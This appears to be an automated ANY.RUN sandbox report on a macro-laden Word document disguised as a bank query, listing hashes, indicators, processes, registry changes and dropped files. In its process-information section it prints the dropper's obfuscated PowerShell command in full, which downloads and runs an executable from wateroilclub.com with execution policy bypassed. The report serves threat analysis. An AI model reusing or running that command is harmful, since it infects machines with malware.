File name:

Bankquery_F01CITIGB2LO890.doc

Full analysis: https://app.any.run/tasks/46437900-1790-488f-aa49-db68a03ea07f
Verdict: Malicious activity
Analysis date: December 14, 2018, 15:32:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-close
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Little Pig, Template: Normal, Last Saved By: Windows User, Revision Number: 6, Name of Creating Application: Microsoft Office Word, Total Editing Time: 25:00, Create Time/Date: Fri Dec 14 03:47:00 2018, Last Saved Time/Date: Fri Dec 14 11:23:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

F2A0F32103D18A22BACCB8BEB49E8842

SHA1:

535ACAB98D3945415918C96A401665EA487F9467

SHA256:

F275889EF0DDC8F71A2976012C292E7582600361FD0B29CFAE54E31001A6EA3B

SSDEEP:

3072:4fnUfnxCHcNySimxyO8ebDk3j4CL/8orHk6mssQA8y4Q7S9JfHc+K1E7Gj0XR:yex5Ny+xyOX44O0rxnQO49v8+K2GQX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 3172)

    • Application was dropped or rewritten from another process

      • opwgjqrdq.exe (PID: 3684)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3172)

  • SUSPICIOUS

    No suspicious indicators.

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3172)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3172)

    • Dropped object may contain Bitcoin addresses

      • WINWORD.EXE (PID: 3172)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Little Pig
Keywords: -
Template: Normal
LastModifiedBy: Windows User
RevisionNumber: 6
Software: Microsoft Office Word
TotalEditTime: 25.0 minutes
CreateDate: 2018:12:14 03:47:00
ModifyDate: 2018:12:14 11:23:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Unicode (UTF-8)
Company: Microsoft
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
32
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start start winword.exe opwgjqrdq.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3172"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Bankquery_F01CITIGB2LO890.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
3684"C:\Users\admin\AppData\Local\Temp\vuwln\opwgjqrdq.exe" $fatsdoejsmwviksttmmrmjbapm='$pa';$ixqjvizuyaxiuiadcesrs='= ''esh';$zcyiwzjgwghlkmigsgbtvmsbuou04='roce';$dgaoantyxhwyqhosetlyuthy='erh'';Set-';$uixqgmfcusnkugeqjixcdddnyo=' ''\';$inujsfenwiuxtzxxy='w-Objec';$tjoaeeehaioeatitbbie='h=(f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$enraiophlpooaowlpbmcu='vuwln'')';$oeehpaexsyfpazbenk='ss; $pat';$detuyfajximwispw='s $path;R';$ylaldgbbyuyvykwiewdkauu='(''https';$yajxauywyeffjhw='t Syst';$eumaptrpfkrzauaurkfabdqju90='t-Proces';$zdxvcaonbocnyyxcnnyxxo='emo';$xxqrgnohhhrrynvlgjxjjq3='$en';$oemlzprozqsxsukcg='cy Byp';$kscsioyrqlaauyruao='m.exe'',';$iacbqrlafwmmyqzhm=' -force;';$xkxcdlthaimrzanztkc0='ent';$fnibyyimvuuvkkxb40='ile';$ysnbkaqkpjlmmwwvrieomdretredm='ass -Scop';$utzpduyaoktitgjbddpso='env:te';$usutyzyacojzst='xe'');';$fnlunxmejjiayyztjcaruvvf74='heh ';$iesxxhhonsztacuywtb='dmy.e';$kknavgjihlypsaru='lclub';$mxldyuhvoziuoueu='ionPoli';$ujwueywoiieqxii=' -recurse';$sqztnpdiyknvruungfxfob9='Star';$zliucnthuievwlieirmnd='mp+';$stecwerctloadif='Execut';$utsrqouejuiemfez='et.Webcli';$agmrtdopxvzqncnielzsyspkba='$rb';$ivkdyxarcqpaixipvznju9=').Downl';$biraleqoosjuyugeq='://wa';$ioitprwatxacvlejgvniea='(Ne';$ubakcyieavarweoamgg='.com/f';$fjehwklrayabewoiiumclwc60='ve-Item (';$ubjjmeyyiyiwcnznfqo='ile/dw';$iobgimwmauzufmiuxobafz='e P';$ickzixqoyinkgpclbfryfo='oadF';$qixbqbfjabtfwymxebpmwpzbmhln='em.N';$icgzkxdyjqqwvuyuwxxxopse08='th); ';$qmoiaiyuyeptnwvlg='v:temp +';$cuoopnzlsrxeedfhigusez='teroi';$xmduafsdsualmleajuecjey05='ers';$npaqnzyeoeibxvuo='''\einmrm'; Invoke-Expression ($agmrtdopxvzqncnielzsyspkba+$xmduafsdsualmleajuecjey05+$fnlunxmejjiayyztjcaruvvf74+$ixqjvizuyaxiuiadcesrs+$dgaoantyxhwyqhosetlyuthy+$stecwerctloadif+$mxldyuhvoziuoueu+$oemlzprozqsxsukcg+$ysnbkaqkpjlmmwwvrieomdretredm+$iobgimwmauzufmiuxobafz+$zcyiwzjgwghlkmigsgbtvmsbuou04+$oeehpaexsyfpazbenk+$tjoaeeehaioeatitbbie+$utzpduyaoktitgjbddpso+$zliucnthuievwlieirmnd+$npaqnzyeoeibxvuo+$iesxxhhonsztacuywtb+$usutyzyacojzst+$ioitprwatxacvlejgvniea+$inujsfenwiuxtzxxy+$yajxauywyeffjhw+$qixbqbfjabtfwymxebpmwpzbmhln+$utsrqouejuiemfez+$xkxcdlthaimrzanztkc0+$ivkdyxarcqpaixipvznju9+$ickzixqoyinkgpclbfryfo+$fnibyyimvuuvkkxb40+$ylaldgbbyuyvykwiewdkauu+$biraleqoosjuyugeq+$cuoopnzlsrxeedfhigusez+$kknavgjihlypsaru+$ubakcyieavarweoamgg+$ubjjmeyyiyiwcnznfqo+$kscsioyrqlaauyruao+$fatsdoejsmwviksttmmrmjbapm+$icgzkxdyjqqwvuyuwxxxopse08+$sqztnpdiyknvruungfxfob9+$eumaptrpfkrzauaurkfabdqju90+$detuyfajximwispw+$zdxvcaonbocnyyxcnnyxxo+$fjehwklrayabewoiiumclwc60+$xxqrgnohhhrrynvlgjxjjq3+$qmoiaiyuyeptnwvlg+$uixqgmfcusnkugeqjixcdddnyo+$enraiophlpooaowlpbmcu+$ujwueywoiieqxii+$iacbqrlafwmmyqzhm);C:\Users\admin\AppData\Local\Temp\vuwln\opwgjqrdq.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\users\admin\appdata\local\temp\vuwln\opwgjqrdq.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
1 430
Read events
1 022
Write events
398
Delete events
10

Modification events

(PID) Process:(3172) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:0x%
Value:
30782500640C0000010000000000000000000000
(PID) Process:(3172) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3172) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3172) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1301151774
(PID) Process:(3172) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1301151888
(PID) Process:(3172) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1301151889
(PID) Process:(3172) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
640C00009E97B637C293D40100000000
(PID) Process:(3172) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:'y%
Value:
27792500640C000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3172) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:'y%
Value:
27792500640C000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3172) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
13
Suspicious files
0
Text files
121
Unknown types
2

Dropped files

PID
Process
Filename
Type
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9030.tmp.cvr
MD5:
SHA256:
3172WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:
SHA256:
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\vuwln\Certificate.format.ps1xmlxml
MD5:
SHA256:
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\vuwln\DotNetTypes.format.ps1xmlxml
MD5:
SHA256:
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\vuwln\CompiledComposition.Microsoft.PowerShell.GPowerShell.dllexecutable
MD5:
SHA256:
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\vuwln\Diagnostics.Format.ps1xmltext
MD5:
SHA256:
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$nkquery_F01CITIGB2LO890.docpgc
MD5:
SHA256:
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\vuwln\en-US\about_Automatic_Variables.help.txttext
MD5:96A664E1A1EE05B3A0C24D3187F9A1A9
SHA256:F6F0CE7433667264EB7483B8C5EF62BEC39CC4F3E7D24378471AF28CD458FED7
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\vuwln\en-US\about_Command_Syntax.help.txttext
MD5:847B0C3A6010660492ECC1D88A69210D
SHA256:7D7EE4469AE76392317DC7E16E716B5767BD7EEFCDC39F60C51ED1DA2E99AE2B
3172WINWORD.EXEC:\Users\admin\AppData\Local\Temp\vuwln\en-US\about_Comment_Based_Help.help.txttext
MD5:8D7E5AD25683E71CD1DFE4949A754BC5
SHA256:A653702F520D12525099F8C7FF70A92D812C3DD3965D2D4953C2FA6840916ECD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
wateroilclub.com
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Bankquery_F01CITIGB2LO890.doc